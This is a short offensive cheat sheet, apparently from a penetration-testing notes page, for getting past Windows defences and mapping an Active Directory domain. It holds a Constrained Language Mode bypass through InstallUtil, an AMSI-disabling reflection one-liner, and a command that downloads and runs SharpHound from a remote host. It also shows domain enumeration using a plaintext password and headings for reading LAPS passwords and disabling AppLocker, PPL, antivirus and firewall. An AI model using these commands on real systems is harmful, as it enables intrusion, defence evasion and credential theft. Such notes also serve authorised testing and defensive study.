Application Whitelisting & Credentials
CLM
Check CLM
$ExecutionContext.SessionState.LanguageModeBypass CLM
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe"AMSI
Check AMSI
'amsiutils'Disable AMSI
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)Enumerate Domain
iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1")
Invoke-BloodHound -CollectionMethod All -Verbose
SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!'
ipmo .\adpeas.ps1
Invoke-adPEASLAPS
Check LAPS
Read Password
AppLocker
Check AppLocker
Bypass AppLocker
PPL
Check PPL
Remove PPL
Shutdown AV and Firewall
In PowerShell
In RDP
Manually shut down WD.
Last updated